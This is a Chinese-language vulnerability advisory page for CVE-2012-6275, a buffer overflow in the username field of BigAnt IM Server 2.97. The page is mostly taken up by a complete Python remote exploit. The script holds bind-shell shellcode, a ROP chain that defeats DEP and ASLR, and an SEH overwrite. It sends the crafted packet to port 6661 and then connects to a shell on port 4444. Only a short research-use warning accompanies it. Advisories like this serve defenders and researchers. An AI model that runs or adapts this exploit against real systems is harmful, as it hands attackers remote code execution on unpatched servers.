发布日期:2013-04-10
更新日期:2013-04-12受影响系统:
bigantsoft BigAnt IM Server
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 58998
CVE(CAN) ID: 2012-6275
BigAnt IM Server是BigAnt Messenger企业即时通讯平台所使用的消息服务器。
BigAnt IM Server 2.97由于没有对用户提供的输入进行有效的边界检查,在实现上存在缓冲区溢出漏洞,攻击者可利用此漏洞在服务器上下文中执行任意代码。
<*来源:Craig Freyman (@cd1zz)
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#!/usr/bin/python
#Title: BigAnt Server 2.97 DDNF Username Buffer Overflow
#Author: Craig Freyman (@cd1zz) http://pwnag3.com
#Tested on: Windows 7 64 bit (DEP/ASLR Bypass)
#Similar Exploits:
#http://www.exploit-db.com/exploits/24528/
#http://www.exploit-db.com/exploits/24527/
#http://www.exploit-db.com/exploits/22466/ import socket,os,struct,sys,subprocess,time if len(sys.argv) < 2:
print "[-]Usage: %s <target addr> " % sys.argv[0] + "
"
sys.exit(0) host = sys.argv[1] #msfpayload windows/shell_bind_tcp LPORT=4444 R | msfencode -b "x00x0ax0dx20x25x27"
sc = (
"xd9xecxbax1fxafx04x2dxd9x74x24xf4x5dx2bxc9"
"xb1x56x31x55x18x03x55x18x83xc5x1bx4dxf1xd1"
"xcbx18xfax29x0bx7bx72xccx3axa9xe0x84x6ex7d"
"x62xc8x82xf6x26xf9x11x7axefx0ex92x31xc9x21"
"x23xf4xd5xeexe7x96xa9xecx3bx79x93x3ex4ex78"
"xd4x23xa0x28x8dx28x12xddxbax6dxaexdcx6cxfa"
"x8exa6x09x3dx7ax1dx13x6exd2x2ax5bx96x59x74"
"x7cxa7x8ex66x40xeexbbx5dx32xf1x6dxacxbbxc3"
"x51x63x82xebx5cx7dxc2xccxbex08x38x2fx43x0b"
"xfbx4dx9fx9ex1exf5x54x38xfbx07xb9xdfx88x04"
"x76xabxd7x08x89x78x6cx34x02x7fxa3xbcx50xa4"
"x67xe4x03xc5x3ex40xe2xfax21x2cx5bx5fx29xdf"
"x88xd9x70x88x7dxd4x8ax48xe9x6fxf8x7axb6xdb"
"x96x36x3fxc2x61x38x6axb2xfexc7x94xc3xd7x03"
"xc0x93x4fxa5x68x78x90x4axbdx2fxc0xe4x6dx90"
"xb0x44xddx78xdbx4ax02x98xe4x80x35x9ex2axf0"
"x16x49x4fx06x89xd5xc6xe0xc3xf5x8exbbx7bx34"
"xf5x73x1cx47xdfx2fxb5xdfx57x26x01xdfx67x6c"
"x22x4cxcfxe7xb0x9exd4x16xc7x8ax7cx50xf0x5d"
"xf6x0cxb3xfcx07x05x23x9cx9axc2xb3xebx86x5c"
"xe4xbcx79x95x60x51x23x0fx96xa8xb5x68x12x77"
"x06x76x9bxfax32x5cx8bxc2xbbxd8xffx9axedxb6"
"xa9x5cx44x79x03x37x3bxd3xc3xcex77xe4x95xce"
"x5dx92x79x7ex08xe3x86x4fxdcxe3xffxadx7cx0b"
"x2ax76x8cx46x76xdfx05x0fxe3x5dx48xb0xdexa2"
"x75x33xeax5ax82x2bx9fx5fxcexebx4cx12x5fx9e"
"x72x81x60x8b") #rop chain generated with mona.py - www.corelan.be
rop_gadgets = ""
rop_gadgets += struct.pack("<L",0x0f9edaa9) # POP EDX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0fa021cc) # ptr to &VirtualProtect() [IAT expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9ea2a7) # MOV ECX,DWORD PTR DS:[EDX] # SUB EAX,ECX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9e0214) # PUSH ECX # SUB AL,5F # POP ESI # POP EBP # RETN 0x24 [expsrv.dll]
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x0f9ee3d9) # POP ECX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x0F9A5001) # &Writable location
rop_gadgets += struct.pack("<L",0x0f9f1e7c) # POP EDX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0xffffffff) # EDX starting value
for i in range(0,65): rop_gadgets += struct.pack("<L",0x0f9dbb5a) # INC EDX # RETN ghetto style [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9e65b6) # POP EAX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0xfffffdff) # Value to negate, will become 0x00000201
rop_gadgets += struct.pack("<L",0x0f9f2831) # NEG EAX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9c5f4b) # POP EDI # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0FA0C001) # put this in edi so the nex one doesnt die, writable for edi
rop_gadgets += struct.pack("<L",0x0f9e2be0) # PUSH EAX # OR BYTE PTR DS:[EDI+5E],BL # POP EBX # POP EBP # RETN 0x08 ** [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9e24f9) # push esp # ret 0x08 | {PAGE_EXECUTE_READ} [expsrv.dll
rop_gadgets += struct.pack("<L",0x0f9c5f4b) # POP EDI # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x41414141) # Filler (compensate)
rop_gadgets += struct.pack("<L",0x0f9e5cd2) # RETN (ROP NOP) [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9c8a3e) # POP EAX # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x909006eb) # nop with a ninja jump
rop_gadgets += struct.pack("<L",0x0f9f30c2) # PUSHAD # RETN [expsrv.dll]
rop_gadgets += struct.pack("<L",0x0f9e5cd2) # RETN (ROP NOP) [expsrv.dll] front = "A" * 684
seh = struct.pack("<L",0x0f9eeb8a) # ADD ESP,1004 [expsrv.dll]
back = "C" * 1592
stack_adjust = "x81xc4x24xfaxffxff"
junk = "D" * (4000 - (len(front) + len(seh) + len(back) + len(rop_gadgets) + len(stack_adjust) + len(sc))) sploit = front + seh + back + rop_gadgets + stack_adjust + sc + junk
print "[+] Sending pwnag3 to " + str(host) try :
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,6661))
s.send(""
"DDNF 17
"
"classid: 100
"
"cmdid: 1
"
"objid: 1
"
"rootid: 3
"
"userid: 8
"
"username: "+sploit+
"
")
time.sleep(1)
except:
print "[-] There was a problem"
sys.exit() print "[+] Getting your shell. "
time.sleep(3)
subprocess.Popen("telnet "+host+" 4444",shell=True).wait()
print"[*] Done."
s.close()建议:
--------------------------------------------------------------------------------
厂商补丁:
bigantsoft
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.bigantsoft.com/download.htmlLinux Kernel net/netfilter/ipvs/ip_vs_ctl.c本地信息泄露漏洞(CVE-2012-6540)Linux Kernel drivers/net/tun.c __tun_chr_ioctl本地信息泄露漏洞(CVE-2012-6547)相关资讯 BigAnt IM Server 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站